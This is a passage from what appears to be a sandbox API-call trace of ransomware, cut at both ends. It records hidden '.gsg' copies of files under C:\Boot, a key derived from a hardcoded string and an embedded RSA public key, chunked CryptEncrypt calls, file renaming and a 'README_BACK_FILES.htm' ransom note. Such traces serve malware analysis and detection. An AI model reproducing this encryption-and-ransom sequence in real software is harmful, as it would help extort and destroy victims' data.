nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2863418*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.195] ReadFile (in: hFile=0xffffffff, lpBuffer=0x66dea8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x66dea8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.195] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x66dea8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x66dea8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.195] WriteFile (in: hFile=0x5cec, lpBuffer=0x66dea8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x66dea8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.195] CloseHandle (hObject=0xffffffff) returned 1 [0126.195] CloseHandle (hObject=0x5cec) returned 1 [0126.196] CopyFileA (lpExistingFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0126.199] SetFileAttributesA (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0126.199] DeleteFileA (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.gsg")) returned 1 [0126.200] MoveFileA (lpExistingFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.fuck")) returned 0 [0126.200] CryptDestroyHash (hHash=0x69d768) returned 1 [0126.200] CryptDestroyKey (hKey=0x69d6e8) returned 1 [0126.200] CryptReleaseContext (hProv=0x5b00c8, dwFlags=0x0) returned 1 [0126.200] FindNextFileA (in: hFindFile=0x69d968, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0126.201] FindClose (in: hFindFile=0x69d968 | out: hFindFile=0x69d968) returned 1 [0126.201] GetFileAttributesA (lpFileName="C:\\\\Boot\\bg-BG\\README_BACK_FILES.htm" (normalized: "c:\\boot\\bg-bg\\readme_back_files.htm")) returned 0xffffffff [0126.201] AreFileApisANSI () returned 1 [0126.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d328, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0126.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d328, cbMultiByte=-1, lpWideCharStr=0x5c4be0, cchWideChar=37 | out: lpWideCharStr="C:\\\\Boot\\bg-BG\\README_BACK_FILES.htm") returned 37 [0126.201] CreateFileW (lpFileName="C:\\\\Boot\\bg-BG\\README_BACK_FILES.htm" (normalized: "c:\\boot\\bg-bg\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.201] GetFileType (hFile=0x5cd8) returned 0x1 [0126.202] GetLastError () returned 0x0 [0126.202] SetLastError (dwErrCode=0x0) [0126.202] GetLastError () returned 0x0 [0126.202] SetLastError (dwErrCode=0x0) [0126.202] WriteFile (in: hFile=0x5cd8, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0126.203] CloseHandle (hObject=0x5cd8) returned 1 [0126.203] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.203] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f7a8 | out: lpSystemTimeAsFileTime=0x2c5f7a8) [0126.203] GetLastError () returned 0x0 [0126.203] SetLastError (dwErrCode=0x0) [0126.203] GetLastError () returned 0x0 [0126.203] SetLastError (dwErrCode=0x0) [0126.203] GetLastError () returned 0x0 [0126.203] SetLastError (dwErrCode=0x0) [0126.203] GetLastError () returned 0x0 [0126.203] SetLastError (dwErrCode=0x0) [0126.203] GetLastError () returned 0x0 [0126.203] SetLastError (dwErrCode=0x0) [0126.203] GetLastError () returned 0x0 [0126.203] SetLastError (dwErrCode=0x0) [0126.203] GetLastError () returned 0x0 [0126.203] SetLastError (dwErrCode=0x0) [0126.203] GetLastError () returned 0x0 [0126.203] SetLastError (dwErrCode=0x0) [0126.203] GetLastError () returned 0x0 [0126.203] SetLastError (dwErrCode=0x0) [0126.203] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetLastError () returned 0x0 [0126.204] SetLastError (dwErrCode=0x0) [0126.204] GetFileAttributesA (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 0x26 [0126.206] SetFileAttributesA (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT", dwFileAttributes=0x80) returned 1 [0126.206] CreateFileA (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.206] CreateFileA (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT.gsg" (normalized: "c:\\boot\\bootstat.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0126.206] SetFileAttributesA (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT.gsg", dwFileAttributes=0x2) returned 1 [0126.207] CryptAcquireContextA (in: phProv=0x2c5e7a4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e7a4*=0x5b00c8) returned 1 [0126.208] CryptCreateHash (in: hProv=0x5b00c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e7a8 | out: phHash=0x2c5e7a8) returned 1 [0126.208] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.208] CryptHashData (hHash=0x69d368, pbData=0x5bcd68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.208] CryptDeriveKey (in: hProv=0x5b00c8, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e794 | out: phKey=0x2c5e794*=0x69d6e8) returned 1 [0126.208] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----y\x02\x04", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e7b0, pcbBinary=0x2c5e790, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e7b0, pcbBinary=0x2c5e790, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.208] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e7b0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e784, pcbStructInfo=0x2c5e78c | out: pvStructInfo=0x2c5e784, pcbStructInfo=0x2c5e78c) returned 1 [0126.209] CryptAcquireContextA (in: phProv=0x2c5e7a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e7a0*=0x66db20) returned 1 [0126.209] CryptImportPublicKeyInfo (in: hCryptProv=0x66db20, dwCertEncodingType=0x1, pInfo=0x27da038*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27da068*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27da070*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e798 | out: phKey=0x2c5e798*=0x69d968) returned 1 [0126.209] CryptEncrypt (in: hKey=0x69d968, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e788*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e788*=0x80) returned 1 [0126.209] CryptEncrypt (in: hKey=0x69d968, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1e38*, pdwDataLen=0x2c5e79c*=0x18, dwBufLen=0x80 | out: pbData=0x5d1e38*, pdwDataLen=0x2c5e79c*=0x80) returned 1 [0126.209] WriteFile (in: hFile=0x5cec, lpBuffer=0x5d1e38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x5d1e38*, lpNumberOfBytesWritten=0x2c5e7ac*=0x80, lpOverlapped=0x0) returned 1 [0126.210] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.211] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.211] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.264] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.264] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.264] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.264] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.264] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.264] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.264] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.264] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.264] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.265] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.265] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.265] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.265] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.265] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.265] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.265] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.265] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.265] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.265] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.265] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.266] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.266] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.266] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.266] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.266] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.266] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.266] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.266] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.266] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.266] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.266] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.266] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.266] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.266] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.266] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.266] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.266] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.267] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.267] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.267] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.267] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.267] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.267] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.267] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.267] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.267] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.267] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.267] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.267] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.268] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.268] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.268] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.268] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.268] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.268] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.268] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.268] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.268] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.268] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, 